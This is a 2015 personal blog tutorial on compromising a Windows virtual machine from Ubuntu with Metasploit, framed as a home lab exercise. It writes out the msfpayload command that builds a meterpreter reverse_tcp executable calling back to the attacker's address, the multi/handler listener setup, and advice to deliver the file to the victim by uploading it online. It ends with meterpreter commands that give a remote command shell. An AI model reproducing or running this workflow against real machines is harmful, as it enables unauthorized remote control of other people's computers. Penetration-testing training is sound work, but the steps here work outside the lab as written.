Sunday, 3 May 2015

Exploiting Windows machine from Ubuntu using Metasploit Framework ..!!

Hello again..
This post is in continuation to my previous post http://piu28.blogspot.in/2015/05/installing-metasploit-framework-on.html in which i have discussed the installation of Metasploit Framework on Ubuntu virtual machine. Now let me remind you that i have created two virtual machines: Ubuntu 14.10 and Windows 8.1. What i am gonna do now is "Attacking Windows machine from Ubuntu through the use of Metasploit".

Run both of the machines through Virtual Machine Manager.

Checking IPaddress of Ubuntu 14.10 machine by running the command "ifconfig" from the terminal:

Checking IPaddress of Windows 8.1 machine by running the command "ipconfig" from the command prompt:
So, the IPaddress of my Ubuntu virtual machine is 192.168.122.250 and the IPaddress of my Windows virtual machine is 192.168.122.205.

Now, from Ubuntu, run the following command in the root terminal:

$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.122.250 LPORT=4444 x > /home/priyanka/Desktop/reverse_tcp.exe

It created an executable file at my Desktop. Now, migrate this executable file to the victim's machine i.e. Windows machine (in my case) either by uploading it online or just transferring it through some device.

So now, i got the executable file i.e. reverse_tcp.exe on my Windows virtual machine.

Again, come to Ubuntu machine and run the command "msfconsole" (without the quotation marks) from the root terminal.
The Metasploit Framework will load.
Run the commands as follows:
  1. use exploit/multi/handler
  2. set payload windows/meterpreter/reverse_tcp
  3. set LHOST=192.168.122.250 (i.e. the IPaddress of the attacking machine)
  4. set LPORT=4444
  5. show options (optional)
  6. exploit
After exploiting, go to Windows virtual machine and run the reverse_tcp.exe. A meterpreter session will open up as shown:
Thats all you need " A meterpreter session" (http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics). The power of meterpreter lies in its commands. I have used only a few:
  • getuid: displays the user that the Meterpreter server is running as on the host.
  • ipconfig: displays the network interfaces and addresses on the remote machine. 
  • ps: displays a list of running processes on the target. 
  • sysinfo: displays the system information.
  • execute: runs a command on the target.
For example, meterpreter> execute -f cmd.exe -i -H 
It will provide access to the command prompt of Windows machine.

Hope it helps someone to initiate with Metasploit meterpreter..!! Do let me know if it does..!!

This is for educational purposes only.

Thankyou..!! :-) 

 
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)